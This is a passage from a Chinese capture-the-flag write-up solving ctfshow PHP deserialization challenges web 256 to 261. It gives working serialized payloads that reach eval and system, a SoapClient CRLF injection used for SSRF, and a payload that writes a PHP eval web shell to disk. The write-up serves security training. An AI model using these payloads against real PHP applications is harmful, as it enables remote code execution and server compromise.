class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$username</span>) && <span class="keyword">isset</span>(<span class="variable">$password</span>)){</span><br><span class="line"><span class="variable">$user</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$_COOKIE</span>[<span class="string">'user'</span>]); </span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$user</span>-><span class="title function_ invoke__">login</span>(<span class="variable">$username</span>,<span class="variable">$password</span>)){</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$user</span>-><span class="title function_ invoke__">checkVip</span>()){</span><br><span class="line"><span class="variable">$user</span>-><span class="title function_ invoke__">vipOneKeyGetFlag</span>();</span><br><span class="line">}</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"no vip,no flag"</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>在此前的基础上,只是多加了⼀个username!==password 那么只需要在反序列化的时候改⼀下就⾏</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span></span><br><span class="line"><span class="class"></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span> = <span class="string">'mumuzi'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span> = <span class="string">'0.38'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$isVip</span> = <span class="literal">true</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title function_ invoke__">ctfShowUser</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260104224003574.png" alt="image-20260104224003574"></p><p>然后注意传参的username和password记得改</p><h1 id="web-257"><a href="#web-257" class="headerlink" title="web 257"></a>web 257</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Author</span>: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Date</span>: 2020-12-02 17:44:47</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified by: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified time: 2020-12-02 20:33:07</span></span><br><span class="line"><span class="comment"># <span class="doctag">@email</span>: h1xa<span class="doctag">@ctfer</span>.com</span></span><br><span class="line"><span class="comment"># <span class="doctag">@link</span>: https://ctfer.com</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span>{</span><br><span class="line"><span class="keyword">private</span> <span class="variable">$username</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">private</span> <span class="variable">$password</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">private</span> <span class="variable">$isVip</span>=<span class="literal">false</span>;</span><br><span class="line"><span class="keyword">private</span> <span class="variable">$class</span> = <span class="string">'info'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>-><span class="class"><span class="keyword">class</span>=<span class="title">new</span> <span class="title">info</span>();</span></span><br><span class="line"><span class="class">}</span></span><br><span class="line"><span class="class"><span class="title">public</span> <span class="title">function</span> <span class="title">login</span>($<span class="title">u</span>,$<span class="title">p</span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->username===<span class="variable">$u</span>&&<span class="variable language_">$this</span>->password===<span class="variable">$p</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>-><span class="class"><span class="keyword">class</span>-><span class="title">getInfo</span>();</span></span><br><span class="line"><span class="class">}</span></span><br><span class="line"><span class="class">}</span></span><br><span class="line"><span class="class"><span class="title">class</span> <span class="title">info</span></span>{</span><br><span class="line"><span class="keyword">private</span> <span class="variable">$user</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getInfo</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->user;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">backDoor</span></span>{</span><br><span class="line"><span class="keyword">private</span> <span class="variable">$code</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getInfo</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">eval</span>(<span class="variable language_">$this</span>->code);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="variable">$username</span>=<span class="variable">$_GET</span>[<span class="string">'username'</span>];</span><br><span class="line"><span class="variable">$password</span>=<span class="variable">$_GET</span>[<span class="string">'password'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$username</span>) && <span class="keyword">isset</span>(<span class="variable">$password</span>)){</span><br><span class="line"><span class="variable">$user</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$_COOKIE</span>[<span class="string">'user'</span>]);</span><br><span class="line"><span class="variable">$user</span>-><span class="title function_ invoke__">login</span>(<span class="variable">$username</span>,<span class="variable">$password</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>⾸先反序列化的时候会实例化info类</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">public function __construct(){</span><br><span class="line">$this->class=new info();</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>其次在摧毁的时候会调⽤getInfo⽅法</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">public function __destruct(){</span><br><span class="line">$this->class->getInfo();</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>这⾥getInfo⽅法是在info类当中的</p><p>⽽我们要做到的是调⽤backDoor中的getInfo类,因为这个类有eval可以让我们命令执⾏ 因此在脚本中,将</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">private $class = 'info';</span><br><span class="line">public function __construct(){</span><br><span class="line">$this->class=new info();</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>改成</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">private $class = 'backDoor';</span><br><span class="line">public function __construct(){</span><br><span class="line">$this->class=new backDoor();</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>再去反序列化</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A18%3A%22%00ctfShowUser%00class%22%3</span><br><span class="line">BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A2</span><br><span class="line">3%3A%22system%28%22tac+flag.php%22%29%3B%22%3B%7D%7D</span><br></pre></td></tr></table></figure><h1 id="web-258"><a href="#web-258" class="headerlink" title="web 258"></a>web 258</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Author</span>: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Date</span>: 2020-12-02 17:44:47</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified by: h1xa</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Last</span> Modified time: 2020-12-02 21:38:56</span></span><br><span class="line"><span class="comment"># <span class="doctag">@email</span>: h1xa<span class="doctag">@ctfer</span>.com</span></span><br><span class="line"><span class="comment"># <span class="doctag">@link</span>: https://ctfer.com</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$isVip</span>=<span class="literal">false</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$class</span> = <span class="string">'info'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>-><span class="class"><span class="keyword">class</span>=<span class="title">new</span> <span class="title">info</span>();</span></span><br><span class="line"><span class="class">}</span></span><br><span class="line"><span class="class"><span class="title">public</span> <span class="title">function</span> <span class="title">login</span>($<span class="title">u</span>,$<span class="title">p</span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->username===<span class="variable">$u</span>&&<span class="variable language_">$this</span>->password===<span class="variable">$p</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>-><span class="class"><span class="keyword">class</span>-><span class="title">getInfo</span>();</span></span><br><span class="line"><span class="class">}</span></span><br><span class="line"><span class="class">}</span></span><br><span class="line"><span class="class"><span class="title">class</span> <span class="title">info</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$user</span>=<span class="string">'xxxxxx'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getInfo</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">return</span> <span class="variable language_">$this</span>->user;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">backDoor</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$code</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getInfo</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">eval</span>(<span class="variable language_">$this</span>->code);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="variable">$username</span>=<span class="variable">$_GET</span>[<span class="string">'username'</span>];</span><br><span class="line"><span class="variable">$password</span>=<span class="variable">$_GET</span>[<span class="string">'password'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$username</span>) && <span class="keyword">isset</span>(<span class="variable">$password</span>)){</span><br><span class="line"><span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">'/[oc]:\d+:/i'</span>, <span class="variable">$_COOKIE</span>[<span class="string">'user'</span>])){</span><br><span class="line"><span class="variable">$user</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$_COOKIE</span>[<span class="string">'user'</span>]);</span><br><span class="line">}</span><br><span class="line"><span class="variable">$user</span>-><span class="title function_ invoke__">login</span>(<span class="variable">$username</span>,<span class="variable">$password</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>只是在刚刚的基础上过滤了⼀下</p><p>使⽤O:+代替O</p><p>还有个改动是private $code变成了public $code、还有public $class</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfShowUser</span></span></span><br><span class="line"><span class="class"></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$class</span> = <span class="string">'backDoor'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>-><span class="class"><span class="keyword">class</span>=<span class="title">new</span> <span class="title">backDoor</span>();</span></span><br><span class="line"><span class="class">}</span></span><br><span class="line"><span class="class">}</span></span><br><span class="line"><span class="class"><span class="title">class</span> <span class="title">backDoor</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$code</span> = <span class="string">'system("tac flag.php");'</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title function_ invoke__">ctfShowUser</span>();</span><br><span class="line"><span class="variable">$a</span> = <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>);</span><br><span class="line"><span class="variable">$a</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">"O:"</span>,<span class="string">"O:+"</span>,<span class="variable">$a</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="variable">$a</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">O%3A%2B11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22</span><br><span class="line">backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A23%3A%22system%28%22tac+flag.</span><br><span class="line">php%22%29%3B%22%3B%7D%7D</span><br></pre></td></tr></table></figure><h1 id="web259"><a href="#web259" class="headerlink" title="web259"></a>web259</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$vip</span> = <span class="title function_ invoke__">unserialize</span>(<span class="variable">$_GET</span>[<span class="string">'vip'</span>]);</span><br><span class="line"><span class="comment">//vip can get flag one key</span></span><br><span class="line"><span class="variable">$vip</span>-><span class="title function_ invoke__">getFlag</span>();</span><br><span class="line">Notice: Undefined index: vip in /<span class="keyword">var</span>/www/html/index.php on line <span class="number">6</span></span><br><span class="line">Fatal error: Uncaught <span class="built_in">Error</span>: Call to a member <span class="function"><span class="keyword">function</span> <span class="title">getFlag</span>(<span class="params"></span>) <span class="title">on</span> <span class="title">bool</span> <span class="title">i</span></span></span><br><span class="line"><span class="function"><span class="title">n</span> /<span class="title">var</span>/<span class="title">www</span>/<span class="title">html</span>/<span class="title">index</span>.<span class="title">php</span>:8 <span class="title">Stack</span> <span class="title">trace</span>: #0 </span>{main} thrown in /<span class="keyword">var</span>/www/htm</span><br><span class="line">l/index.php on line <span class="number">8</span></span><br></pre></td></tr></table></figure><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#flag.php</span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="variable">$xff</span> = <span class="title function_ invoke__">explode</span>(<span class="string">','</span>, <span class="variable">$_SERVER</span>[<span class="string">'HTTP_X_FORWARDED_FOR'</span>]);</span><br><span class="line"><span class="title function_ invoke__">array_pop</span>(<span class="variable">$xff</span>);</span><br><span class="line"><span class="variable">$ip</span> = <span class="title function_ invoke__">array_pop</span>(<span class="variable">$xff</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$ip</span>!==<span class="string">'127.0.0.1'</span>){</span><br><span class="line"><span class="keyword">die</span>(<span class="string">'error'</span>);</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="variable">$token</span> = <span class="variable">$_POST</span>[<span class="string">'token'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$token</span>==<span class="string">'ctfshow'</span>){</span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="string">'flag.txt'</span>,<span class="variable">$flag</span>);</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>参考:<a href="https://zhuanlan.zhihu.com/p/80918004">https://zhuanlan.zhihu.com/p/80918004</a></p><p>使⽤SoapClient反序列化+CRLF可以⽣成任意POST请求</p><p>Deserialization + __call + SoapClient + CRLF = SSRF </p><p>ssrf去访问flag.php,POST传token==ctfshow,xff 127.0.0.1</p><p>注意xff部分,将X-Forwarded-For按照 <strong>,</strong> 分为数组,接着pop第⼀个元素,⽤的是第⼆个元素来作为ip</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ua="ctfshow\nX-Forwarded-For:127.0.0.1,127.0.0.1"</span><br></pre></td></tr></table></figure><p>然后构造post</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ua="ctfshow\nX-Forwarded-For:127.0.0.1,127.0.0.1\nContent-Type: applicatio</span><br><span class="line">n/x-www-form-urlencoded\nContent-Length:13\n\ntoken=ctfshow";</span><br></pre></td></tr></table></figure><p>这⾥注意到length=13,即token=ctfshow,这样在取的时候就不会取到后⾯的部分</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line">$ua="ctfshow\nX-Forwarded-For:127.0.0.1,127.0.0.1\nContent-Type: applicatio</span><br><span class="line">n/x-www-form-urlencoded\nContent-Length:13\n\ntoken=ctfshow";</span><br><span class="line">$client = new SoapClient(NULL,array('uri'=>"http://127.0.0.1","location"=></span><br><span class="line">"http://127.0.0.1/flag.php","user_agent"=>$ua));</span><br><span class="line">echo urlencode(serialize($client));</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A16%3A%22http%3A%2F%2F127.0.0.1%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A124%3A%22ctfshow%0AX-Forwarded-For%3A127.0.0.1%2C127.0.0.1%0AContentType%3A+application%2Fx-www-form-urlencoded%0AContent-Length%3A13%0A%0Atoken%3Dctfshow%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D</span><br></pre></td></tr></table></figure><p>传vip=,然后会⽣成flag.txt,访问即可</p><h1 id="web-260"><a href="#web-260" class="headerlink" title="web 260"></a>web 260</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">'flag.php'</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">'/ctfshow_i_love_36D/'</span>,<span class="title function_ invoke__">serialize</span>(<span class="variable">$_GET</span>[<span class="string">'ctfshow'</span>]))){</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>意思就是ctfshow序列化之后有/ctfshow_i_love_36D/ 直接传就可以了</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctfshow=/ctfshow_i_love_36D/</span><br></pre></td></tr></table></figure><h1 id="web261"><a href="#web261" class="headerlink" title="web261"></a>web261</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ctfshowvip</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$code</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$u</span>,<span class="variable">$p</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>->username=<span class="variable">$u</span>;</span><br><span class="line"><span class="variable language_">$this</span>->password=<span class="variable">$p</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">if</span>(<span class="variable language_">$this</span>->username!=<span class="string">''</span> || <span class="variable language_">$this</span>->password!=<span class="string">''</span>){</span><br><span class="line"><span class="keyword">die</span>(<span class="string">'error'</span>);</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">eval</span>(<span class="variable language_">$this</span>->code);</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__sleep</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>->username=<span class="string">''</span>;</span><br><span class="line"><span class="variable language_">$this</span>->password=<span class="string">''</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__unserialize</span>(<span class="params"><span class="variable">$data</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>->username=<span class="variable">$data</span>[<span class="string">'username'</span>];</span><br><span class="line"><span class="variable language_">$this</span>->password=<span class="variable">$data</span>[<span class="string">'password'</span>];</span><br><span class="line"><span class="variable language_">$this</span>->code = <span class="variable language_">$this</span>->username.<span class="variable language_">$this</span>->password;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="keyword">if</span>(<span class="variable language_">$this</span>->code==<span class="number">0x36d</span>){</span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$this</span>->username, <span class="variable">$this</span>->password);</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="title function_ invoke__">unserialize</span>(<span class="variable">$_GET</span>[<span class="string">'vip'</span>]);</span><br></pre></td></tr></table></figure><p>注意到public function <strong>invoke()中有⼀个eval,那个肯定是我们想要得到的</strong></p><p>其次,在__destruct()中有⼀个⽂件写⼊的过程,将password写⼊到username中 然后可以注意到⾥⾯有个__unserialize</p><p>如果 __unserialize() 和 __wakeup() 两个魔术⽅法都定义在⽤⼀个对象中, 则只有 __unse rialize() ⽅法会⽣效, __wakeup() ⽅法会被忽略</p><p>所以不⽤担⼼</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">public function __wakeup(){</span><br><span class="line">if($this->username!='' || $this->password!=''){</span><br><span class="line">die('error');</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>$this->code==0x36d是个弱⽐较,code是username和password拼接得到的,取数字部分 0x36d的10进制是877</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line">class ctfshowvip{</span><br><span class="line">public $username = "877.php";</span><br><span class="line">public $password = '<?php @eval($_GET[1]);?>';</span><br><span class="line">}</span><br><span class="line">$a = new ctfshowvip();</span><br><span class="line">echo urlencode(serialize($a));</span><br><span class="line">?></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">O%3A10%3A%22ctfshowvip%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A7%3A%22877.</span><br><span 